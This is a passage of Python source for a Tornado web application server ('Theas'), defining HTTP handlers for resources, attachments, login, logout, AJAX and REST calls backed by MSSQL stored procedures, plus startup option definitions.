resource_code = DEFAULT_RESOURCE_CODE
if resource is None or not resource.exists:
# Call get_resources again, this time with a session
resource = G_cached_resources.get_resource(resource_code, self.session, none_if_not_found=True)
if resource is None or not resource.exists:
# If the user is logged in, but resource_code is not specified, we explicitly set get_default_resource
# so that the stored proc can look up the correct resource for us.
# This change was made 9/21/2017 to correct a problem that led to 404 errors resulting in serving
# up the default resource.
self.session.log('Get Resource', 'Logged in?', self.session.logged_in)
self.session.log('Get Resource', 'resource_code', resource_code if resource_code is not None else 'None')
resource = G_cached_resources.get_resource(resource_code, self.session, none_if_not_found=True,
get_default_resource=self.session.logged_in)
if resource is not None and resource.exists and resource.resource_code != LOGIN_RESOURCE_CODE and \
resource.render_jinja_template:
# We may have retrieved a cached resource. Set current_resource.
self.session.current_resource = resource
if resource is not None and resource.exists:
if resource.on_before:
this_function = getattr(TheasCustom, resource.on_before)
if this_function:
handled = this_function(self, args, kwargs)
if resource.requires_authentication and not self.session.logged_in:
if not self.session.logged_in:
# still not logged in: present login screen
self.session.bookmark_url = resource.resource_code
# self.session.bookmark_url = self.request.path.rsplit('/', 1)[1]
self.session.current_resource = resource
# NOTE: this needs further thought.
# Sometimes it is nice to send the login screen in response to a request
# for an auth-required resource if the user is not logged in.
# Other times, we might prefer to send a 404 error, or to navigate
# to index, etc. (consider <img src="xxx">, <audio>, etc.)
buf = self.session.build_login_screen()
write_log(self.session, 'Response', 'Sending login screen')
if buf is None and (not resource.requires_authentication or self.session.logged_in):
if resource.api_stored_proc or resource.render_jinja_template:
buf, redirect_to, history_go_back = self.do_render_response(this_resource=resource)
else:
# note: resource.data will usually be str but might be bytes
buf = resource.data
if resource.on_after:
this_function = getattr(TheasCustom, resource.on_after)
if this_function:
handled = this_function(self, args, kwargs)
if not handled:
if redirect_to is not None:
if self.cookies_changed:
# must perform a client-side redirect in order to set cookies
self.write(self.session.clientside_redir(redirect_to))
self.session.finished()
else:
# can send a normal redirect, since no cookies need to be written
self.session.finished()
buf = None
self.redirect(redirect_to)
else:
if history_go_back:
pass
else:
if buf is None:
write_log(self.session, 'Response',
'Sending 404 error in response to HTTP GET request for {}'.format(resource_code))
self.send_error(status_code=404)
if buf is not None:
write_log(self.session, 'Response', 'Sending response to HTTP GET request for {}'.format(resource_code))
self.write(buf)
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
if resource is not None and resource.is_public:
self.set_header('Cache-Control', ' max-age=900') # let browser cache for 15 minutes
else:
self.set_header('Cache-Control', 'Cache-Control: no-store, no-cache, must-revalidate, max-age=0')
self.add_header('Cache-Control', 'Cache-Control: post-check=0, pre-check=0')
self.add_header('Cache-Control', 'Pragma: no-cache')
if self.filename is not None:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(self.filename))
self.set_header('Content-Disposition', 'inline; filename=' + self.filename)
elif resource is not None and resource.filename:
if resource.filetype:
self.set_header('Content-Type', resource.filetype)
else:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(resource.filename))
self.set_header('Content-Disposition', 'inline; filename=' + resource.filename)
self.finish()
if self.session is not None:
self.session.comments = None
self.session.finished()
self.session.log('Request',
'At end, Current Resource is {}'.format(
self.session.current_resource.resource_code
if self.session.current_resource
else 'Not Assigned!'
))
# def write_error(self, status_code, **kwargs):
# msg = ''
# if self.this_sess.sql_conn == None:
# msg = 'There is no database connection. '
# msg = msg + e.args[0] + ' ' + e.message
# print('Error: ' + msg)
# self.write('<html><body>Sorry, you encountered an error. Error message: ' + msg + '</body></html>')
# self.finish()
# #if 'exc_info' in kwargs and issubclass(kwargs['exc_info'][0], ForbiddenException):
# # self.set_status(403)
# def _handle_request_exception(self, e):
@tornado.gen.coroutine
def options(self, resource_code=None, *args, **kwargs):
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Allow-Methods', 'POST, GET, PUT, DELETE')
self.set_header('Access-Control-Allow-Headers', 'X-Requested-With, Content-Type')
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Attach attachment handler
# -------------------------------------------------
class ThHandler_Attach(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
def retrieve_attachment(self):
# Do everything that is needed to process a request for a quest attachment
self.session.log('Attach', 'Retrieving quest attachment')
attachment = None
attachment_guid = None
filename = None
filetype = None
buf = None
attachment_guid = self.get_argument('guid', default=None)
if attachment_guid is None:
attachment_guid = self.request.path.split('/')[-1]
if attachment_guid.lower() == 'attach':
attachment_guid = None
if attachment_guid is not None:
# Get attachment data from database
proc = ThStoredProc('theas.spgetAttachment', self.session)
if proc.is_ok:
proc.bind(attachment_guid, _mssql.SQLCHAR, '@AttachmentGUID')
proc_result = proc.execute(fetch_rows=False)
for row in proc.th_session.sql_conn:
filename = row['Filename']
buf = row['AttachmentData']
if 'Filetype' in row:
filetype = row['Filetype']
if buf is not None:
attachment = {}
attachment['filename'] = filename
attachment['data'] = buf
attachment['filetype'] = filetype
return attachment
@run_on_executor
def retrieve_attachment_background(self):
return self.retrieve_attachment()
def retrieve_webresource(self):
global G_cached_resources
# Do everything that is needed to process a request for a sys web resource
self.session.log('Attach', 'Retrieving web resource')
resource_code = None
resource = None
if self.get_arguments('rc'):
resource_code = self.get_argument('rc')
resource = G_cached_resources.get_resource(resource_code, self.session, for_public_use=True)
return resource
@run_on_executor
def retrieve_webresource_background(self):
return self.retrieve_webresource_background(self)
@tornado.gen.coroutine
def get(self, *args, **kwargs):
# MAIN ENTRY POINT FOR ATTACH HTTP GET REQUEST
# retrieve or create session
ThSession.cls_log('Attach', '*******************************')
ThSession.cls_log('Attach', args[0])
self.session = yield self.wait_for_session(write_to_cookie=False)
if self.session is not None:
self.session.log('Attach', 'Have session')
self.session.log('Attach',
'Current Resource is {}'.format(
self.session.current_resource.resource_code
if self.session.current_resource
else 'Not Assigned!'
))
if self.get_arguments('rc'):
if USE_WORKER_THREADS:
resource = yield self.retrieve_webresource_background()
else:
resource = self.retrieve_webresource()
self.session.log('Attach', 'Sending SysWebResource')
self.write(resource.data)
if resource.filetype:
self.set_header('Content-Type', resource.filetype)
else:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(resource.filename))
self.set_header('Content-Disposition', 'inline; filename=' + resource.filename)
else:
# if not self.session.logged_in:
# self.send_error(status_code=404)
# self.session.log('Response', 'Sending 404 for attachment request due to no login')
# else:
if USE_WORKER_THREADS:
attachment = yield self.retrieve_attachment_background()
else:
attachment = self.retrieve_attachment()
if attachment is not None:
self.session.log('Attach', 'Sending attachment response')
self.write(attachment['data'])
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(attachment['filename']))
if attachment['filetype']:
self.set_header('Content-Type', attachment['filetype'])
else:
self.set_header('Content-Type', theas.Theas.mimetype_for_extension(attachment['filename']))
self.set_header('Content-Disposition', 'inline; filename=' + attachment['filename'])
self.finish()
else:
self.send_error(status_code=404)
self.session.finished()
self.session = None
def data_received(self, chunk):
pass
# -------------------------------------------------
# TestThreadedHandler sample thread handler
# -------------------------------------------------
class TestThreadedHandler(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
def process_request(self):
# This will be executed in 'executor' pool.
return '<html><body>Made it to TestThreadedHandler.background_process_requesat!</body></html>'
@run_on_executor
def process_request_background(self):
return self.process_request
@tornado.gen.coroutine
def get(self, *args, **kwargs):
if USE_WORKER_THREADS:
buf = yield self.process_request_background()
else:
buf = self.process_request()
self.write(buf)
self.finish()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Logout logout handler
# -------------------------------------------------
class ThHandler_Logout(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
global G_sessions
if self.session is None:
self.session = yield self.wait_for_session()
nextURL = '/'
if self.session is not None:
# after logout, try to navigate to the same page
#if self.session.current_resource:
#nextURL = self.session.current_resource.resource_code
self.session.logout()
G_sessions.remove_session(self.session.session_token)
self.cookie_st = None
self.cookie_usertoken = None
self.write_cookies()
ThSession.cls_log('Cookies',
'Clearing cookies {} and {} in Logout'.format(SESSION_COOKIE_NAME, USER_COOKIE_NAME))
if self.cookies_changed:
self.write(self.session.clientside_redir(nextURL))
self.session.finished()
self.finish()
else:
self.redirect(nextURL)
self.session = None
# no self.finish needed, due to redirect
# self.finish()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Login login handler
# -------------------------------------------------
class ThHandler_Login(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
global G_sessions
if self.session is None:
self.session = yield self.wait_for_session()
if self.session is not None:
self.session.logout()
G_sessions.remove_session(self.session.session_token)
self.cookie_st = None
self.cookie_usertoken = None
self.write_cookies()
ThSession.cls_log('Cookies',
'Clearing cookies {} and {} due to login'.format(SESSION_COOKIE_NAME, USER_COOKIE_NAME))
# self.redirect('/')
# self.session = None
##no self.finish needed, due to redirect
##self.finish()
self.session = yield self.wait_for_session()
buf = self.session.build_login_screen()
if self.session is not None:
self.session.log('Response', 'Sending login screen')
self.set_header('Content-Type', theas.Theas.mimetype_for_extension('login.html'))
self.set_header('Content-Disposition', 'inline; filename=' + 'login.html')
self.write_cookies()
self.write(buf)
self.finish()
if self.session is not None:
self.session.finished()
@tornado.gen.coroutine
def post(self, *args, **kwargs):
global G_sessions
if self.session is None:
self.session = yield self.wait_for_session()
success = False
error_message = ''
success, error_message = self.session.authenticate()
self.session.theas_page.set_value('theas:th:ErrorMessage', '{}'.format(error_message))
resource = G_cached_resources.get_resource(None, self.session, none_if_not_found=True,
get_default_resource=self.session.logged_in)
self.write_cookies()
next_page = ''
if self.session.logged_in:
if resource:
next_page = resource.resource_code
else:
next_page = DEFAULT_RESOURCE_CODE
else:
next_page = ''
buf = 'theas:th:LoggedIn={}&theas:th:ErrorMessage={}&theas:th:NextPage={}'.format(
'1' if self.session.logged_in else '0',
error_message,
next_page)
self.write(buf)
self.finish()
if self.session is not None:
self.session.finished()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Async async (AJAX) handler
# -------------------------------------------------
class ThHandler_Async(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def post(self, *args, **kwargs):
global G_cached_resources
ThSession.cls_log('Async', '*******************************')
# Note: The async request is to a generic url of /async
# To determine what type of async request is being made, we look to the session's current_resource
# If current_resource is not set (such as due to a new session), we look to the Theas param
# th:CurrentPage
buf = ''
cmd = None
if self.get_arguments('cmd'):
cmd = self.get_argument('cmd')
if not cmd and self.get_body_arguments('cmd'):
cmd = self.get_body_argument('cmd')
self.session = yield self.wait_for_session()
if self.session is not None:
# update theas parameters based on this post...even if there is not an async stored proc
self.session.theas_page.process_client_request(request_handler=self, accept_any=False)
if self.session.current_resource is None:
if cmd == 'resetPassword':
resource_code = 'login'
else:
# Request may have provided Theas param 'th:CurrentPage'
# If session does not have current_resource set, trust 'th:CurrentPage'
# This allows us to process the async request in situations where the session went away due
# to timeout or server restart (assuming "remember me" / user token in cookie is enabled)
resource_code = self.session.theas_page.get_value('th:CurrentPage')
if resource_code.strip() == '':
resource_code = None
if resource_code is not None:
self.session.current_resource = G_cached_resources.get_resource(resource_code, self.session)
self.session.log('Async:',
'Current Resource Code',
self.session.current_resource.resource_code
if self.session.current_resource
else 'No current resource for this session!')
self.process_uploaded_files()
# process uploaded files, even if there is no async proc
# do_log=(not cmd == 'heartbeat'))
if cmd == 'heartbeat':
if self.session is not None and self.session.sql_conn is not None:
self.write('sessionOK')
else:
self.write('invalidSession')
if self.session is not None:
self.session.finished()
if cmd == 'clearError':
if self.session is not None and self.session.sql_conn is not None:
self.session.theas_page.set_value('th:ErrorMessage', '')
self.write('clearError')
self.session.finished()
else:
async_proc_name = None
theas_params_str = ''
if self.session is not None:
self.session.log('Async', str(self.request.body_arguments))
try:
if self.session.current_resource is None:
# Something is wrong. Perhaps the async request came in before a resource had been served?
# This could happen if the TheasServer was restarted after a page was sent to the browser,
# Javascript on the page could submit an async requests...which we can't handle, because
# the original session no longer exists.
raise TheasServerError(
'There is a problem with your session. Click the "reload" button in your browser.' +
'|Invalid Session|Async request was received before a SysWebResource was served. Perhaps ' +
'your session expired, or the server was restarted after this page was loaded.')
else:
async_proc_name = self.session.current_resource.api_async_stored_proc
if async_proc_name:
# 5/11/2018 moved up, to as soon as we have a session. We want to update theas parameters
# even if there is no async stored proc.
# self.session.theas_page.process_client_request(request_handler=self, accept_any=False)
row_count = 0
form_params = self.request.body_arguments
# We want to serialize form data (excluding theas: fields)
form_params_str = ''
for key in form_params:
if not key.startswith('theas:'):
this_val = form_params[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
form_params_str = form_params_str + key + '=' + urlparse.quote(this_val) + '&'
# We also want to serialize all Theas controls
theas_params_str = self.session.theas_page.serialize()
self.session.log('Async', 'Async stored proc is: {}'.format(async_proc_name))
self.session.log('Async',
'Resource code is: {}'.format(self.session.current_resource.resource_code))
proc = ThStoredProc(async_proc_name, self.session)
if not proc.is_ok:
self.session.log('Async',
'ERROR: AsyncProcName {} is not valid. in ThHandler_Async.Post'.format(
async_proc_name))
else:
proc.refresh_parameter_list()
# if '@QuestGUID' in proc.parameter_list and self.session.theas_page.get_value('questGUID') is not None:
# proc.bind(self.session.theas_page.get_value('questGUID'), _mssql.SQLCHAR, '@QuestGUID')
# if '@StepGUID' in proc.parameter_list and self.session.theas_page.get_value('stepGUID') is not None:
# proc.bind(self.session.theas_page.get_value('stepGUID'), _mssql.SQLCHAR, '@StepGUID')
# if '@StepDefID' in proc.parameter_list and self.session.theas_page.get_value('stepDefID') is not None:
# proc.bind(self.session.theas_page.get_value('stepDefID'), _mssql.SQLCHAR, '@StepDefID')
if '@Command' in proc.parameter_list:
proc.bind(cmd, _mssql.SQLCHAR, '@Command')
if '@Document' in proc.parameter_list:
proc.bind(self.request.path.rsplit('/', 1)[1], _mssql.SQLCHAR, '@Document')
if '@HTTPParams' in proc.parameter_list:
proc.bind(self.request.query, _mssql.SQLCHAR, '@HTTPParams')
if '@FormParams' in proc.parameter_list:
proc.bind(form_params_str, _mssql.SQLCHAR, '@FormParams')
if '@TheasParams' in proc.parameter_list:
# proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams', output=proc.parameter_list['@TheasParams']['is_output'])
# Would prefer to use output parameter, but this seems not to be supported by FreeTDS. So
# we look to the resultest(s) returned by the stored proc instead.
proc.bind(theas_params_str, _mssql.SQLCHAR, '@TheasParams')
# Execute stored procedure
proc_result = proc.execute(fetch_rows=False)
# For the async stored proc, we are expecting it to return only a single resultset, and in most
# cases to return only a single row.
# We watch for a few special column names: TheasParams is a column the stored proc can use to
# return name/value pairs that should update the theas_page.controls. AsyncResponse is a column
# that the stored proc can use to return raw data that will be passed on to the browser as the
# response to the async request.
# If the async stored proc does return multiple rows, these column values from each row are
# concatenated together.
theas_params_str = ''
if proc.th_session.sql_conn is not None:
theas_params_str = ''
buf = ''
for row in proc.th_session.sql_conn:
row_count += 1
if 'ErrorMessage' in row:
if not row['ErrorMessage'] is None and row['ErrorMessage'] != '':
# self.session.theas_page.set_value('theas:th:ErrorMessage',
# row['ErrorMessage'])
buf = 'theas:th:ErrorMessage=' + \
urlparse.quote(format_error(row['ErrorMessage'])) + '&'
if 'TheasParams' in row:
if row['TheasParams'] is not None:
theas_params_str = theas_params_str + row['TheasParams']
if 'AsyncResponse' in row:
if row['AsyncResponse'] is not None:
buf = buf + row['AsyncResponse'] + '&'
self.session.log('Async', '{row_count} rows returned by async stored proc'.format(
row_count=row_count))
if row_count == 0:
raise (TheasServerError('No result row returned by async stored proc.'))
changed_controls = None
if theas_params_str:
changed_controls = self.session.theas_page.process_client_request(
buf=theas_params_str, accept_any=True, from_stored_proc=True)
# let stored proc create any desired Theas controls, so these values can be used
# when rendering the template.
except TheasServerError as e:
# e = sys.exc_info()[0]
err_msg = e.value if hasattr(e, 'value') else e
buf = 'theas:th:ErrorMessage=' + urlparse.quote(format_error(err_msg))
except Exception as e:
# We would like to catch specific MSSQL exceptions, but these are declared with cdef
# in _mssql.pyx ... so they are not exported to python. Should these be declared
# with cpdef?
err_msg = None
err_msg = e.text.decode('ascii')
buf = 'theas:th:ErrorMessage=' + urlparse.quote(format_error(err_msg))
self.session.log('Async',
'ERROR when executing stored proc {}: {}'.format(
async_proc_name, err_msg))
if len(buf) > 0:
# stored proc specified an explicit response
self.write(buf)
else:
# stored proc did not specify an explicit response: send updated controls only
# if there are any, otherwise send all controls
# self.write(self.session.theas_page.serialize(control_list = changed_controls))
# send ALL Theas controls
self.write(self.session.theas_page.serialize())
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
self.session.finished()
self.session = None
self.finish()
@tornado.gen.coroutine
def get(self, *args, **kwargs):
return self.post(*args, **kwargs)
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_REST async (AJAX) handler
# -------------------------------------------------
'''
ThHandler_REST is similar to ThHandler_Async, except for:
1) Async is for calls associated with a normal page (i.e. page
is served up, and then subsequent async calls are made),
whereas REST is not associated with a normal page.
2) Async uses SysWebResources. REST does not. (REST
uses SysRequestTypes instead)
3) By default, REST will destroy the session after each
request.
4) REST does not do anything with Theas Params
'''
class ThHandler_REST(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
def get_rest_resource(self, resource_code, th_session):
this_resource = None
if resource_code:
resource_code = resource_code.strip()
if resource_code == '':
resource_code = None
# load resource from database
th_session.log('Resource', 'ThCachedResources.get_rest_resource fetching from database',
resource_code if resource_code is not None else 'None')
# Get SysWebResourcesdata from database
this_proc = ThStoredProc('theas.spgetSysWebResources', th_session)
if this_proc.is_ok:
# Note: we could check for existence of @GetDefaultResource down below to help with backwards
# compatibility ... but that would mean having to call refresh_parameter_list, which is
# unnecessary overhead.
# this_proc.refresh_parameter_list()
this_proc.bind(resource_code, _mssql.SQLCHAR, '@ResourceCode', null=(resource_code is None))
proc_result = this_proc.execute(fetch_rows=False)
assert proc_result, 'ThCachedResources.load_resource received error result from call to theas.spgetSysWebResources in the SQL database.'
row_count = 0
this_static_blocks_dict = {}
if this_proc.th_session.sql_conn is not None:
for row in this_proc.th_session.sql_conn:
row_count += 1
buf = row['ResourceText']
if not buf:
buf = row['ResourceData']
if buf:
buf = bytes(buf)
this_resource = ThResource()
this_resource.resource_code = row['ResourceCode']
this_resource.filename = row['Filename']
this_resource.data = buf
this_resource.api_stored_proc = row['APIStoredProc']
this_resource.api_async_stored_proc = row['APIAsyncStoredProc']
this_resource.api_stored_proc_resultset_str = row['ResourceResultsets']
this_resource.is_public = row['IsPublic']
this_resource.is_static = row['IsStaticBlock']
this_resource.requires_authentication = row['RequiresAuthentication']
this_resource.render_jinja_template = row['RenderJinjaTemplate']
this_resource.skip_xsrf = row['SkipXSRF']
if 'OnBefore' in row:
this_resource.on_before = row['OnBefore']
if 'OnAfter' in row:
this_resource.on_after = row['OnAfter']
if 'Revision' in row:
this_resource.revision = row['Revision']
if this_resource.resource_code:
self.add_resource(row['ResourceCode'], this_resource)
this_proc = None
del this_proc
return this_resource
@tornado.gen.coroutine
def post(self, resource_code=None, *args, **kwargs):
global G_cached_resources
buf = ''
try:
# spin up a new session
self.session = yield self.wait_for_session()
if self.session is None:
raise TheasServerError('Session could not be established for REST request.')
# try to find required resource
resource_code = None
resource = None
request_path = None
if len(args) >= 0:
request_path = args[0]
if request_path is not None and request_path.split('/')[0] == 'r':
# Special case: an "r" as the first segment of the path, such as:
# r/resourcecode/aaa/bbb
# indicates that the second segment is to be the resource code.
# This allows URLs such as /r/img/myimg.jpg to be handled dynamically: the resource img is
# loaded, and then myimg.jpg is passed in. (Otherwise the resource would be taken to be
# img/myimg.jpg
resource_code = request_path.split('/')[1]
else:
resource_code = request_path
if resource_code and resource_code.count('.') >= 2:
# A versioned filename, i.e. my.23.css for version #23 of my.css
# We just want to cut out the version, and return the unversioned
# filename as the resource code (i.e. my.css)
# That is, Theas will always / only serve up the most recent version
# of a resource. There is not support for serving up a particular
# historical version. The version number in the file name is merely
# for the browser's benefit, so that we can "cache bust" / have the
# browser request the latest version even if it has an old version in
# cache.
# For this reason, we don't really need to inspect the resources.
# We need only manipulate the resource_code to strip out the version
# number.
segments = resource_code.split('.')
if len(segments) >= 3 and 'ver' in segments:
ver_pos = segments.index('ver')
if ver_pos > 0:
resource_code = '.'.join(segments[:ver_pos]) + '.' + '.'.join(segments[ver_pos + 2:])
resource = self.get_rest_resource(resource_code)
rest_proc_name = resource.api_async_stored_proc
# allow REST to receive file uploads
self.process_uploaded_files()
form_params = self.request.body_arguments
# We want to serialize form data
form_params_str = ''
for key in form_params:
this_val = form_params[key]
if isinstance(this_val, list) and len(this_val) > 0:
this_val = this_val[0]
if isinstance(this_val, bytes):
this_val = this_val.decode('utf-8')
elif this_val:
this_val = str(this_val)
form_params_str = form_params_str + key + '=' + urlparse.quote(this_val) + '&'
self.session.log('REST', 'REST stored proc is: {}'.format(rest_proc_name))
proc = ThStoredProc(rest_proc_name, self.session)
if not proc.is_ok:
self.session.log('REST',
'ERROR: REST proc name {} is not valid. in ThHandler_Async.Post'.format(
rest_proc_name))
else:
proc.refresh_parameter_list()
if '@Document' in proc.parameter_list:
proc.bind(self.request.path.rsplit('/', 1)[1], _mssql.SQLCHAR, '@Document')
if '@HTTPParams' in proc.parameter_list:
proc.bind(self.request.query, _mssql.SQLCHAR, '@HTTPParams')
if '@FormParams' in proc.parameter_list:
proc.bind(form_params_str, _mssql.SQLCHAR, '@FormParams')
# Execute stored procedure
proc_result = proc.execute(fetch_rows=False)
# For the rest stored proc, we are expecting it to return only a single resultset that
# contains only a single row.
# We watch for a few special column names: RESTResponse is a column
# that the stored proc can use to return raw data that will be passed on to the browser as the
# response to the REST request. Similarly, RESTResponseBin can contain binary data
# to send to the browser. (If present and not null, RESTResponseBin will be served
# instead of RestResponse.)
row_count = 0
if proc.th_session.sql_conn is not None:
buf = ''
for row in proc.th_session.sql_conn:
row_count += 1
if 'ErrorMessage' in row:
if not row['ErrorMessage'] is None and row['ErrorMessage'] != '':
buf = 'Stored procedure returned an error:' + \
urlparse.quote(format_error(row['ErrorMessage']))
if 'RESTResponse' in row:
if row['RESTResponse'] is not None:
buf = row['RESTResponse']
assert row_count > 0, 'No result row returned by REST stored proc.'
except TheasServerError as e:
# e = sys.exc_info()[0]
err_msg = e.value if hasattr(e, 'value') else e
buf = 'theas:th:ErrorMessage=' + urlparse.quote(err_msg)
except Exception as e:
# We would like to catch specific MSSQL exceptions, but these are declared with cdef
# in _mssql.pyx ... so they are not exported to python. Should these be declared
# with cpdef?
err_msg = None
err_msg = str(e)
buf = 'theas:th:ErrorMessage=' + urlparse.quote(err_msg)
self.session.log('Async',
'ERROR when executing stored proc {}: {}'.format(
rest_proc_name, err_msg))
self.write(buf)
# CORS
self.set_header('Access-Control-Allow-Origin', '*') # allow CORS from any domain
self.set_header('Access-Control-Max-Age', '0') # disable CORS preflight caching
self.session.finished()
self.session = None
self.finish()
@tornado.gen.coroutine
def get(self, *args, **kwargs):
return self.post(*args, **kwargs)
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_Back "back" handler
# -------------------------------------------------
class ThHandler_Back(ThHandler):
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
if self.session is None:
# try to get the session, but do not wait for it
self.session = yield self.wait_for_session(seconds_to_wait=0)
if self.session is not None:
if len(self.session.history) > 1:
self.session.history.pop()
this_history_entry = self.session.history[-1]
self.session.theas_page.set_value('theas:th:NextPage', this_history_entry['PageName'])
self.session.log('Response', 'Sending clientside redir')
self.write(self.session.clientside_redir())
##Handle the actual form processing here. When done, we will persist session data and redirect.
# buf = yield self.background_process_post_authenticated()
##buf = self.background_process_post_authenticated()
# self.write(buf)
# self.session.log('Response', 'Sending response for back request')
self.session.finished()
else:
if self.cookies_changed():
# must perform a client-side redirect in order to set cookies
self.session.finished()
# Could redirect if desired. But instead, we'll send an error message and let the browser handle it
# self.redirect('/')
else:
# can send a normal redirect, since no cookies need to be written
# Could redirect if desired. But instead, we'll send an error message and let the browser handle it
# self.write(self.session.clientside_redir('/'))
self.session.finished()
self.session = None
self.finish()
def data_received(self, chunk):
pass
# -------------------------------------------------
# ThHandler_PurgeCache purge cache handler
# -------------------------------------------------
class ThHandler_PurgeCache(ThHandler):
def data_received(self, chunk):
pass
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
def __del__(self):
self.session = None
@tornado.gen.coroutine
def get(self, *args, **kwargs):
global G_cached_resources
message = 'No resource code specified. Nothing to do.'
if len(self.get_arguments('rc')) > 0:
resource_code = self.get_argument('rc')
if resource_code == '_all':
if G_cached_resources.delete_resource(resource_code=None, delete_all=True):
message = 'Purged all cached resources.'
else:
message = 'Nothing purged. Nothing in the cache.'
else:
if G_cached_resources.delete_resource(resource_code=resource_code, delete_all=False):
message = 'Purged cached resource: ' + resource_code
else:
message = 'Nothing purged. Resource code "' + resource_code + '" not found.'
message = message + ' Items remaining in cache: ' + str(G_cached_resources.len())
ThSession.cls_log('Cache', message)
self.write('<html><body>' + message + '</body></html>')
self.finish()
def get_program_directory():
program_cmd = sys.argv[0]
program_directory = ''
program_filename = ''
if program_cmd:
program_directory, program_filename = os.path.split(program_cmd)
if not program_directory:
# no path is provided if running the python script as: python myscript.py
# fall back to CWD
program_directory = os.getcwd()
if program_directory.endswith('system32'):
# a service application may return C:\Windows\System32 as the CWD
# Look to the executable path.
program_directory = os.path.dirname(sys.executable)
if program_directory.endswith('system32'):
# However this too will be returned as C:\Windows\System32 when
# running as a service on Windows Server 2012 R2. In that case...
# we are stuck.
program_directory = ''
program_directory = os.path.normpath(program_directory)
if not program_directory.endswith(os.sep):
program_directory += os.sep
return program_directory, program_filename
# -------------------------------------------------
# ThWSHandler test websocket handler
# -------------------------------------------------
class ThWSHandler_Test(tornado.websocket.WebSocketHandler):
def open(self):
ThSession.cls_log('WebSocket', 'New client connected')
self.write_message("You are connected")
# the client sent the message
def on_message(self, message):
self.write_message('DoFetchData')
# client disconnected
def on_close(self):
ThSession.cls_log('WebSocket', 'Client disconnected')
def run(run_as_svc=False):
global G_program_options
global G_server_is_running
global G_cached_resources
global G_sessions
global G_break_handler
global LOGGING_LEVEL
global SESSION_MAX_IDLE
global REMOVE_EXPIRED_THREAD_SLEEP
global LOGIN_RESOURCE_CODE
global LOGIN_AUTO_USER_TOKEN
global REMEMBER_USER_TOKEN
global DEFAULT_RESOURCE_CODE
global FULL_SQL_IS_OK_CHECK
global FORCE_REDIR_AFTER_POST
global USE_SECURE_COOKIES
global SESSION_HEADER_NAME
global SESSION_COOKIE_NAME
global USER_COOKIE_NAME
global USE_WORKER_THREADS
global MAX_WORKERS
if LOGGING_LEVEL:
msg = 'Theas app getting ready...'
write_winlog(msg)
print(msg)
if not run_as_svc:
# Trap breaks.
G_break_handler = BreakHandler()
if G_break_handler:
G_break_handler.enable()
program_directory, program_filename = get_program_directory()
msg = 'Theas app: Program directory is: {}'.format(program_directory)
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
msg = 'Theas app: program filename is {}'.format(program_filename)
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
msg = 'Theas app: program parameters: {}'.format(str(sys.argv[1:]))
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
G_program_options = tornado.options.options
G_program_options.define("settings_path",
default=program_directory,
help="The path to the folder with configuration files.", type=str)
G_program_options.define("server_prefix",
default="locaohost:8881",
help="The web server address prefix to prepend to URLs that need it.", type=str)
G_program_options.define("port",
default=8881,
help="The TCP/IP port that the web server will listen on", type=int)
G_program_options.define("sql_server",
default=None,
help="Server name of your MSSQL server instance", type=str)
G_program_options.define("sql_port",
default=1433,
help="TCP/IP port for your MSSQL server connections", type=int)
G_program_options.define("sql_user",
help="MSSQL login user name for SQL connections", type=str)
G_program_options.define("sql_password",
help="MSSQL login password for SQL connections", type=str)
G_program_options.define("sql_database",
help="MSSQL default database for SQL connections", type=str)
G_program_options.define("sql_appname",
default="TheasServer",
help="Descriptive name for SQL connections to know the name of this application", type=str)
G_program_options.define("sql_timeout",
default=60,
help="Time (in seconds) to wait for SQL results before timing out. Zero means wait indefinitely.",
type=int)
G_program_options.define("sql_max_connections",
default=100,
help="Maximum number of simultaneous SQL connections allowed.",
type=int)
G_program_options.define("session_max_idle_minutes",
default=SESSION_MAX_IDLE,
help="Maximum idle time (in minutes) that user sessions will remain active", type=int)
G_program_options.define("session_expired_poll_seconds",
default=REMOVE_EXPIRED_THREAD_SLEEP,
help="Time (in seconds) between polls to check for expired sessions", type=int)
G_program_options.define("logging_level",
default=LOGGING_LEVEL,
help="Controls logging. 0 to disable all, 1 to enable all, or threshold to exceed.",
type=int)
G_program_options.define("login_resource_code",
default=LOGIN_RESOURCE_CODE,
help="Resource code of the login screen template.",
type=str)
G_program_options.define("login_auto_user_token",
default=LOGIN_AUTO_USER_TOKEN,
help="User token for the default (public) login.",
type=str)
